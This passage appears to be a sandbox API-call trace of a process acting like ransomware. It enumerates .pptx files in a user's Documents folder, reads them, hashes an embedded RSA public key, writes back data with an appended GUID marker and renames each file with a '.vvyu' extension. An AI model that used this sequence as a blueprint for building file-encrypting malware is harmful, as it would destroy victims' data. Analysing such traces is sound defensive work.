lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0185.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0185.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0185.033] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x7fd7, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x7fd7, lpOverlapped=0x0) returned 1 [0185.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0185.034] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7fdc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.034] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0185.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0185.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0185.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0185.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0185.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0185.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0185.035] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0185.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0185.036] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0185.036] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0185.036] CloseHandle (hObject=0x584) returned 1 [0185.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0185.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0185.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0185.038] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\xyVBcXoxWZOEVZ7.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\xyvbcxoxwzoevz7.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\xyVBcXoxWZOEVZ7.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\xyvbcxoxwzoevz7.pptx.vvyu")) returned 1 [0185.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0185.039] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0185.042] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2965d0, ftCreationTime.dwHighDateTime=0x1d829a0, ftLastAccessTime.dwLowDateTime=0x25121c10, ftLastAccessTime.dwHighDateTime=0x1d8a6a8, ftLastWriteTime.dwLowDateTime=0x25121c10, ftLastWriteTime.dwHighDateTime=0x1d8a6a8, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yqj5KxS1J7UVwOH.pptx", cAlternateFileName="YQJ5KX~1.PPT")) returned 1 [0185.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d387a8 [0185.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0185.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d387a8 | out: hHeap=0x6a0000) returned 1 [0185.042] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Yqj5KxS1J7UVwOH.pptx") returned=".pptx" [0185.042] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Yqj5KxS1J7UVwOH.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\yqj5kxs1j7uvwoh.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0185.044] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=9730) returned 1 [0185.044] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0185.047] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x25dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.047] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0185.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0185.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0185.049] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.049] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x2602, lpOverlapped=0x0) returned 1 [0185.050] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0185.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0185.050] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0185.050] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0185.050] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0185.051] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0185.051] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0185.051] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0185.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0185.051] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0185.051] GetLastError () returned 0x0 [0185.051] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0185.051] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0185.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0185.052] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0185.052] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0185.052] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0185.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2600) returned 0x2d43778 [0185.052] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0185.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d387a8 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0185.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d387f0 [0185.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0185.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0185.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0185.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0185.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0185.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0185.053] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0185.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0185.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0185.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0185.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0185.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0185.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eac8 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4eab0 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0185.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0185.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0185.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0185.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0185.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0185.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0185.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0185.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0185.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0185.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0185.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0185.056] GetCurrentThreadId () returned 0x264 [0185.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0185.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37378 [0185.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0185.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0185.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0185.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0185.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0185.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0185.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0185.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0185.057] GetCurrentThreadId () returned 0x264 [0185.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0185.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0185.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0185.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0185.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0185.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0185.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0185.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0185.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0185.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0185.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0185.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0185.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eac8 [0185.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0185.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0185.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0185.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb28 [0185.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0185.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0185.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0185.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb40 [0185.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0185.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0185.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0185.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0185.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eab0 [0185.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0185.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0185.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb40 | out: hHeap=0x6a0000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0185.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0185.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0185.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0185.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0185.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0185.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0185.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0185.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0185.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0185.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0185.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 